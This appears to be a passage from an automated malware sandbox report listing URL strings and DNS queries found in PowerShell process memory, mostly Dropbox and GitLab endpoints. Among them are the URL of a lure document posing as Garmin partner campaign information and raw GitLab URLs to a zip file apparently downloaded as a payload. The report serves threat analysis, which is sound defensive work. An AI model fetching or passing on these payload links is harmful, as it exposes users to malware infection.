https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: opboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; base-uri 'self' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; frame-ancestors 'self' https://*.dropbox.com ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; font-src https://* data: ; img-src https://* data: blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; media-src https://* blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: www.dropbox.com
                  Source: global trafficDNS traffic detected: DNS query: uca83ad3860e00ba9c5292268edd.dl.dropboxusercontent.com
                  Source: global trafficDNS traffic detected: DNS query: gitlab.com
                  Source: powershell.exe, 0000000C.00000002.1528813287.0000020CF64A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF82E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edge-block-www-env.dropbox-dns.com
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501660000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gitlab.com
                  Source: powershell.exe, 0000000E.00000002.1662345043.000002C5701FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
                  Source: powershell.exe, 0000000C.00000002.1525054616.0000020CEE22E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1525054616.0000020CEE371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDFBAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1650704145.000002C5101B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C5019CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1650704145.000002C51006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1693069885.000001A31367F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1799618095.000001A321EA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1799618095.000001A321D5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000010.00000002.1693069885.000001A311F23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDE1C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1693069885.000001A311CF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF82E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://uca83ad3860e00ba9c5292268edd.dl.dropboxusercontent.com
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www-env.dropbox-dns.com
                  Source: powershell.exe, 00000010.00000002.1693069885.000001A311F23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.dropbox.com
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://a.sprig.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/gsi/client
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDE1C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1693069885.000001A311CF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.login.yahoo.com/
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellofax.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellosign.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://canny.io/sdk.js
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://collector.prd-278964.gl-product-analytics.com
                  Source: powershell.exe, 00000010.00000002.1799618095.000001A321D5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000010.00000002.1799618095.000001A321D5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000010.00000002.1799618095.000001A321D5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://customers.gitlab.com
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl-web.dropbox.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/fsip/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/fsip/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/fsip/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/document/fsip/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docsend.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://experience.dropbox.com/
                  Source: powershell.exe, 00000010.00000002.1693069885.000001A311F23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C500C33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501620000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com(
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/;
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/speedscope/index.html
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/admin/
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/assets/
                  Source: powershell.exe, 0000000E.00000002.1658951690.000002C56E273000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip
                  Source: powershell.exe, 0000000E.00000002.1662213672.000002C5700E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/garvdsf/dsfg/-/raw/main/fga1712.zip
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/users/sign_in
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF340000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C500C33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1693069885.000001A312E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.dropbox.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.yahoo.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://navi.dropbox.jp/
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_env
                  Source: powershell.exe, 0000000C.00000002.1525054616.0000020CEE22E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1525054616.0000020CEE371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDFBAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1650704145.000002C5101B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C5019CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1650704145.000002C51006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1693069885.000001A31367F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1799618095.000001A321EA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1799618095.000001A321D5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps-df.live.com
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/picker
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pal-test.adyen.com
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.dropbox.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sales.dropboxbusiness.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sentry.gitlab.net
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://showcase.dropbox.com/
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://snowplow.trx.gitlab.net
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sourcegraph.com
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uca83ad3860e00ba9c5292268edd.dl.dropboxusercontent.com
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uca83ad3860e00ba9c5292268edd.dl.dropboxusercontent.com/cd/0/get/Cgi0y-YI8TenZYJubto-r9s_MQQd
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.docsend.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF340000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/page_success/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/pithos/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/playlist/
                  Source: powershell.exe, 0000000C.00000002.1496282413.0000020CDC340000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496607984.0000020CDC530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.do
                  Source: powershell.exe, 0000000C.00000002.1528756841.0000020CF6390000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/garmin_campaign_information_for_partners_v10.do
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/service_worker.js
